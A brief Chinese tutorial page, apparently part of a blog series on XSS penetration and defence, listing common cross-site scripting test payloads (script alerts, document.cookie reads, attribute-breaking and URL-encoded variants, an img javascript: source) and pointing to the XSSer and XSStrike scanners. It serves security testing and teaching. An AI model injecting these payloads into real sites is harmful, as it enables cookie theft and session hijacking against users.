章节7:XSS检测和利用

章节7:XSS检测和利用

测试payload

<script>alert('XSS')</script>

<script>alert(document.cookie)</script>

><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<img src="javascript:alert('XSS')">

onerror= "alert('XSS')">

https://blog.csdn.net/weixin_34038652/article/details/90221170

XSSER

https://xsser.03c8.net/

https://www.freebuf.com/sectool/173228.html

https://blog.csdn.net/gao646467783/article/details/113249158

XSSSTRIKE

https://github.com/s0md3v/XSStrike

python 3.6 以上

相关推荐
程序员小勇1 年前
章节5:脚本注入网页-XSS
xss渗透与防御
程序员小勇1 年前
章节2:客户端的Cookie
xss渗透与防御